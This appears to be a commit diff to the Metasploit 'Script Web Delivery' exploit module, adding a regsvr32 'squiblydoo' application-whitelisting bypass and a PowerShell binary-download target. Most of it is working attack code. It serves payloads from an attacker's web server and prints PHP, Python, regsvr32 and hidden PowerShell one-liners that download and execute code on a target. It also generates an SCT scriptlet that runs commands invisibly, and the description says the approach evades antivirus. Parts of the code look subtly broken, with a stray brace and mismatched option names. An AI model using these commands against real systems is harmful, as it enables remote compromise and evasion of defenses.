Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)
commit
4999606b61
|
@ -139,7 +139,7 @@ Gem::Specification.new do |spec|
|
|||
# Library for Generating Randomized strings valid as Identifiers such as variable names
|
||||
spec.add_runtime_dependency 'rex-random_identifier'
|
||||
# library for creating Powershell scripts for exploitation purposes
|
||||
spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"]
|
||||
spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"]
|
||||
# Library for processing and creating Zip compatbile archives
|
||||
spec.add_runtime_dependency 'rex-zip'
|
||||
# Library for parsing offline Windows Registry files
|
||||
|
|
|
@ -8,6 +8,7 @@ require 'msf/core/exploit/powershell'
|
|||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
|
@ -15,22 +16,34 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Script Web Delivery',
|
||||
'Description' => %q(
|
||||
This module quickly fires up a web server that serves a payload.
|
||||
The provided command will start the specified scripting language interpreter and then download and execute the
|
||||
payload. The main purpose of this module is to quickly establish a session on a target
|
||||
machine when the attacker has to manually type in the command himself, e.g. Command Injection,
|
||||
RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
|
||||
write to disk so it is less likely to trigger AV solutions and will allow privilege
|
||||
escalations supplied by Meterpreter. When using either of the PSH targets, ensure the
|
||||
payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute
|
||||
x86 payloads on x64 machines.
|
||||
This module quickly fires up a web server that serves a payload.
|
||||
The provided command which will allow for a payload to download and execute.
|
||||
It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe
|
||||
for bypassing application whitelisting. The main purpose of this module is to quickly establish
|
||||
a session on a target machine when the attacker has to manually type in the command:
|
||||
e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.
|
||||
This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege
|
||||
escalations supplied by Meterpreter.
|
||||
|
||||
When using either of the PSH targets, ensure the payload architecture matches the target computer
|
||||
or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
|
||||
|
||||
Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting.
|
||||
The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included
|
||||
PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute)
|
||||
can occur on the same port.
|
||||
|
||||
"PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.
|
||||
),
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
|
||||
'Ben Campbell',
|
||||
'Chris Campbell' # @obscuresec - Inspiration n.b. no relation!
|
||||
'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
|
||||
'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee)
|
||||
'Trenton Ivey', # AppLocker MSF Module (kn0)
|
||||
'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
@ -38,10 +51,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
},
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
|
||||
['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
|
||||
['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
|
||||
['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
|
||||
['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
|
||||
['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
|
||||
['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
|
||||
['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
|
||||
],
|
||||
'Platform' => %w(python php win),
|
||||
'Targets' =>
|
||||
|
@ -57,45 +71,117 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
['PSH', {
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_X86, ARCH_X64]
|
||||
}],
|
||||
['Regsvr32', {
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_X86, ARCH_X64]
|
||||
}],
|
||||
['PSH (Binary)', {
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_X86, ARCH_X64]
|
||||
}]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jul 19 2013'
|
||||
))
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),
|
||||
OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),
|
||||
OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]),
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
|
||||
def primer
|
||||
php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));")
|
||||
python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());")
|
||||
regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)
|
||||
|
||||
print_status("Run the following command on the target machine:")
|
||||
case target.name
|
||||
when 'PHP'
|
||||
print_line("#{php}")
|
||||
when 'Python'
|
||||
print_line("#{python}")
|
||||
when 'PSH'
|
||||
psh = gen_psh("#{get_uri}", "string")
|
||||
print_line("#{psh}")
|
||||
when 'Regsvr32'
|
||||
print_line("#{regsvr}")
|
||||
when 'PSH (Binary)'
|
||||
psh = gen_psh("#{get_uri}", "download")
|
||||
print_line("#{psh}")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, _request)
|
||||
print_status('Delivering Payload')
|
||||
if target.name.include? 'PSH'
|
||||
if _request.raw_uri =~ /\.sct$/
|
||||
psh = gen_psh("#{get_uri}", "string")
|
||||
data = gen_sct_file(psh)
|
||||
elsif target.name.include? 'PSH (Binary)'
|
||||
data = generate_payload_exe
|
||||
elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'
|
||||
data = cmd_psh_payload(payload.encoded,
|
||||
payload_instance.arch.first,
|
||||
remove_comspec: true,
|
||||
exec_in_place: true
|
||||
)
|
||||
else
|
||||
data = %Q(#{payload.encoded} )
|
||||
data = %Q(#{payload.encoded})
|
||||
end
|
||||
|
||||
if _request.raw_uri =~ /\.sct$/
|
||||
print_status("Handling .sct Request")
|
||||
send_response(cli, data, 'Content-Type' => 'text/plain')
|
||||
else
|
||||
print_status("Delivering Payload")
|
||||
send_response(cli, data, 'Content-Type' => 'application/octet-stream')
|
||||
end
|
||||
send_response(cli, data, 'Content-Type' => 'application/octet-stream')
|
||||
end
|
||||
|
||||
def primer
|
||||
url = get_uri
|
||||
print_status('Run the following command on the target machine:')
|
||||
case target.name
|
||||
when 'PHP'
|
||||
print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
|
||||
when 'Python'
|
||||
print_line('Python:')
|
||||
print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"")
|
||||
when 'PSH'
|
||||
|
||||
def gen_psh(url, *method)
|
||||
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
|
||||
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
|
||||
|
||||
if method.include? 'string'
|
||||
download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
|
||||
else
|
||||
# Random filename to use, if there isn't anything set
|
||||
random = "#{rand_text_alphanumeric 8}.exe"
|
||||
|
||||
# Set filename (Use random filename if empty)
|
||||
filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
|
||||
|
||||
# Set path (Use %TEMP% if empty)
|
||||
path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
|
||||
|
||||
# Join Path and Filename
|
||||
file = %Q(echo (#{path}+'\\#{filename}'))
|
||||
|
||||
# Generate download PowerShell command
|
||||
download_string = Rex::Powershell::PshMethods.download_run(url, file})
|
||||
end
|
||||
|
||||
download_and_run = "#{ignore_cert}#{download_string}"
|
||||
print_line generate_psh_command_line(
|
||||
noprofile: true,
|
||||
windowstyle: 'hidden',
|
||||
command: download_and_run
|
||||
)
|
||||
end
|
||||
|
||||
# Generate main PowerShell command
|
||||
return generate_psh_command_line(noprofile: true,
|
||||
windowstyle: 'hidden',
|
||||
command: download_and_run
|
||||
)
|
||||
end
|
||||
|
||||
|
||||
def rand_class_id
|
||||
"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
|
||||
end
|
||||
|
||||
|
||||
def gen_sct_file(command)
|
||||
%{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
|
||||
end
|
||||
end
|
||||
|
|
|
@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
include Msf::Module::Deprecated
|
||||
|
||||
deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb')
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
Loading…
Reference in New Issue